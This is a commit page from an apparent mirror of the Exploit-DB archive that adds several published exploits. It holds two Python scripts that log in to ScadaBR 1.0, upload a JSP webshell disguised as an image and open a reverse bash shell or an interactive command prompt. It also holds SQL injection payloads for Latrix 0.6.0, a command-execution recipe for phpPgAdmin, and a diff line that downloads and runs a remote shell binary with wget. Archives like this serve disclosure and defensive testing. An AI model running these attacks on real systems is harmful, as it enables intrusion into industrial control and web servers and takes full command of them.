bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-04-02

Browse source 
5 changes to exploits/shellcodes

Latrix 0.6.0 - 'txtaccesscode' SQL Injection
ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)
ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
This commit is contained in:
Offensive Security 2021-04-02 05:01:54 +00:00
parent 3145bbcf80
commit 356d0ac56b
6 changed files with 299 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

115
exploits/linux/webapps/49735.py Executable file
View file

@ -0,0 +1,115 @@
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
# Date: 04/21
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Debian9,10~Ubuntu16.04
#!/usr/bin/python
import requests,sys,time
if len(sys.argv) <=6:
print('[x] Missing arguments ... ')
print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>')
print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444')
sys.exit(0)
else:
time.sleep(1)
host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passw = sys.argv[4]
rev_host = sys.argv[5]
rev_port = sys.argv[6]
flag = False
LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
def main():
payload = {
'username': user,
'password': passw
}
print(banner)
time.sleep(2)
with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)
print "[+] Trying to authenticate "+LOGIN+"..."
if response.status_code == 200:
print "[+] Successfully authenticated! :D~\n"
time.sleep(2)
else:
print "[x] Authentication failed :("
sys.exit(0)
burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n"
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
print('[>] Attempting to upload .jsp Webshell...')
time.sleep(1)
print('[>] Verifying shell upload...\n')
time.sleep(2)
if getdata.status_code == 200:
print('[+] Upload Successfuly! \n')
for num in range(1,1000):
PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
find = s.get(PATH)
if find.status_code == 200:
print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
print('[>] Spawning Reverse Shell...\n')
time.sleep(3)
burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port)
burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
time.sleep(5)
if len(r.text) > 401:
print('[+] Connection received')
sys.exit(0)
else:
print('[x] Failed to receive reverse connection ...\n')
elif num == 999:
print('[x] Failed to found Webshell ... ')
else:
print('Reason:'+getdata.reason+' ')
print('Exploit Failed x_x')
if __name__ == '__main__':
main()

2
exploits/multiple/webapps/49383.py
View file

@ -32,7 +32,7 @@ PASSWORD = "password123"
HOST_ADDR = '192.168.1.1'
HOST_PORT = 3000
URL = 'http://192.168.1.2:3000'
CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'
CMD = 'wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'
# Login
s = requests.Session()

54
exploits/multiple/webapps/49733.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Latrix 0.6.0 'txtaccesscode' SQL Injection
# Date: 03/30/2021
# Exploit Author: cptsticky
# Vendor Homepage: https://sourceforge.net/projects/latrix
# Software Link: https://sourceforge.net/projects/latrix/files/latest/download
# Version: 0.6.0
# Tested on: Ubuntu 20.04
POST /latrix/inandout.php HTTP/1.1
Host: 18.222.194.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://18.222.194.190
Connection: close
Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout
Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1
Upgrade-Insecure-Requests: 1
txtaccesscode=111&btnsubmit=Submit
Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode
Output
----------------snip----------------
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtaccesscode (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit
---
[16:29:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6

15
exploits/multiple/webapps/49736.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)
# Date: 29/03/2021
# Exploit Author: Valerio Severini
# Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0
# Version: 7.13.0 or lower
# Tested on: Debian 10 and Ubuntu
Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement.
Attack Vectors (PoC):
1) you have to create a table manually and call it "cmd_exec" with 1 column
2) add cmd_output and type = text
3) try to execute the query via SQL tabs , but it should fail because of restriction of Statement.
4) A malicious Attacker could bypass this step uploading a .txt file in "Browse" bar, with a SQL malicious query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; "
5) The attacker could execute Remote command execution and obtain full access control executing in SQL query: " SELECT * FROM cmd_exec; "

110
exploits/windows/webapps/49734.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
# Date: 03/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Windows7, Windows10
#!/usr/bin/python
import requests,sys,time
if len(sys.argv) <=4:
print('[x] Missing arguments ... ')
print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>')
print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin')
sys.exit(0)
else:
time.sleep(1)
host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passw = sys.argv[4]
flag = False
LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Windows Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
def main():
payload = {
'username': user,
'password': passw
}
print(banner)
time.sleep(2)
with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)
print("[+] Trying to authenticate "+LOGIN+"...")
if response.status_code == 200:
print("[+] Successfully authenticated! :D~\n")
time.sleep(2)
else:
print("[x] Authentication failed :(")
sys.exit(0)
burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p;\n if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n }\n else{\n p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n }\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n"
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
print('[>] Attempting to upload .jsp Webshell...')
time.sleep(1)
print('[>] Verifying shell upload...\n')
time.sleep(2)
if getdata.status_code == 200:
print('[+] Upload Successfuly!')
for num in range(1,500):
PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
find = s.get(PATH)
if find.status_code == 200:
print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
flag = True
print('[>] Spawning fake shell...')
time.sleep(3)
while flag:
param = raw_input("# ")
burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param)
burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"}
send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '')
print(clean)
elif num == 499:
print('[x] Webshell not Found')
else:
print('Reason:'+getdata.reason+' ')
print('Exploit Failed x_x')
if __name__ == '__main__':
main()

4
files_exploits.csv
View file

@ -43910,3 +43910,7 @@ id,file,description,date,author,type,platform,port
49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple,
49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php,
49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,
49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,
49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,

Can't render this file because it is too large.